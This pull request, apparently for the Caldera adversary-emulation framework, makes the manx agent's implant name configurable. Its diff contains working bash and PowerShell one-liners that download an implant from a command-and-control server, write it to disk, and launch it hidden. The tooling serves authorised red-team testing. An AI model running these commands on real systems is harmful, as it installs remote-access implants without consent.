### PR TITLE
Add #{agents.implant_name} for manx agent deployment

### DIFF
--- a/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml
+++ b/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml
@@ -69,9 +69,8 @@
           $wc.Headers.add("platform","windows");
           $wc.Headers.add("file","manx.go");
           $data=$wc.DownloadData($url);
-          $name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","");
-          Get-Process | ? {$_.Path -like "C:\Users\Public\$name.exe"} | stop-process -f -ea $ErrAction;
-          rm -force "C:\Users\Public\$name.exe" -ea $ErrAction;
+          Get-Process | ? {$_.Path -like "C:\Users\Public\#{agents.implant_name}.exe"} | stop-process -f -ea $ErrAction;
+          rm -force "C:\Users\Public\#{agents.implant_name}.exe" -ea $ErrAction;
           ([io.file]::WriteAllBytes("C:\Users\Public\#{agents.implant_name}.exe",$data)) | Out-Null;
           Start-Process -FilePath C:\Users\Public\#{agents.implant_name}.exe -ArgumentList "-socket $socket -http $server -contact $contact" -WindowStyle hidden;
         variations:
@@ -86,8 +85,7 @@
               $wc.Headers.add("platform","windows");
               $wc.Headers.add("file","manx.go");
               $data=$wc.DownloadData($url);
-              $name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","");
-              Get-Process | ? {$_.Path -like "C:\Users\Public\$name.exe"} | stop-process -f -ea $ErrAction;
-              rm -force "C:\Users\Public\$name.exe" -ea $ErrAction;
+              Get-Process | ? {$_.Path -like "C:\Users\Public\#{agents.implant_name}.exe"} | stop-process -f -ea $ErrAction;
+              rm -force "C:\Users\Public\#{agents.implant_name}.exe" -ea $ErrAction;
               ([io.file]::WriteAllBytes("C:\Users\Public\#{agents.implant_name}.exe",$data)) | Out-Null;
               Start-Process -FilePath C:\Users\Public\#{agents.implant_name}.exe -ArgumentList "-socket $socket -http $server -contact $contact" -WindowStyle hidden;

--- a/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml
+++ b/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml
@@ -14,18 +14,18 @@
           server="#{app.contact.http}";
           socket="#{app.contact.tcp}";
           contact="tcp";
-          curl -s -X POST -H "file:manx.go" -H "platform:darwin" $server/file/download > manx.go;
-          chmod +x manx.go;
-          ./manx.go -http $server -socket $socket -contact $contact -v
+          curl -s -X POST -H "file:manx.go" -H "platform:darwin" $server/file/download > #{agents.implant_name};
+          chmod +x #{agents.implant_name};
+          ./#{agents.implant_name} -http $server -socket $socket -contact $contact -v
         variations:
           - description: Run against the UDP contact
             command: |
               server="#{app.contact.http}";
               socket="#{app.contact.udp}";
               contact="udp";
-              curl -s -X POST -H "file:manx.go" -H "platform:darwin" $server/file/download > manx.go;
-              chmod +x manx.go;
-              ./manx.go -http $server -socket $socket -contact $contact -v
+              curl -s -X POST -H "file:manx.go" -H "platform:darwin" $server/file/download > #{agents.implant_name};
+              chmod +x #{agents.implant_name};
+              ./#{agents.implant_name} -http $server -socket $socket -contact $contact -v
           - description: Download with a random name and start as a background process
             command: |
               server="#{app.contact.http}";
@@ -39,9 +39,9 @@
           server="#{app.contact.http}";
           socket="#{app.contact.tcp}";
           contact="tcp";
-          curl -s -X POST -H "file:manx.go" -H "platform:linux" $server/file/download > manx.go;
-          chmod +x manx.go;
-          ./manx.go -http $server -socket $socket -contact $contact -v
+          curl -s -X POST -H "file:manx.go" -H "platform:linux" $server/file/download > #{agents.implant_name};
+          chmod +x #{agents.implant_name};
+          ./#{agents.implant_name} -http $server -socket $socket -contact $contact -v
         variations:
           - description: Run against the UDP contact
             command: |
@@ -72,8 +72,8 @@
           $name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","");
           Get-Process | ? {$_.Path -like "C:\Users\Public\$name.exe"} | stop-process -f -ea $ErrAction;
           rm -force "C:\Users\Public\$name.exe" -ea $ErrAction;
-          ([io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data)) | Out-Null;
-          Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-socket $socket -http $server -contact $contact" -WindowStyle hidden;
+          ([io.file]::WriteAllBytes("C:\Users\Public\#{agents.implant_name}.exe",$data)) | Out-Null;
+          Start-Process -FilePath C:\Users\Public\#{agents.implant_name}.exe -ArgumentList "-socket $socket -http $server -contact $contact" -WindowStyle hidden;
         variations:
           - description: Run against the UDP contact
             command: |
@@ -89,5 +89,5 @@
               $name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","");
               Get-Process | ? {$_.Path -like "C:\Users\Public\$name.exe"} | stop-process -f -ea $ErrAction;
               rm -force "C:\Users\Public\$name.exe" -ea $ErrAction;
-              ([io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data)) | Out-Null;
-              Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-socket $socket -http $server -contact $contact" -WindowStyle hidden;
+              ([io.file]::WriteAllBytes("C:\Users\Public\#{agents.implant_name}.exe",$data)) | Out-Null;
+              Start-Process -FilePath C:\Users\Public\#{agents.implant_name}.exe -ArgumentList "-socket $socket -http $server -contact $contact" -WindowStyle hidden;


### PR DESCRIPTION
## Description

Allow the manx agent implant name to be a variable users can modify.

## Type of change

Please delete options that are not relevant.

- [x] Bug fix (non-breaking change which fixes an [issue](https://github.com/mitre/caldera/issues/2485))
- [ ] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] This change requires a documentation update

## How Has This Been Tested?
Tested agent deployment and functionality on Linux (Ubuntu) and Windows by deploying a manx agent with a modified name and then interacting with the new agents that spawned from it.

## Checklist:

- [x] My code follows the style guidelines of this project
- [x] I have performed a self-review of my own code
- [ ] I have made corresponding changes to the documentation
- [ ] I have added tests that prove my fix is effective or that my feature works
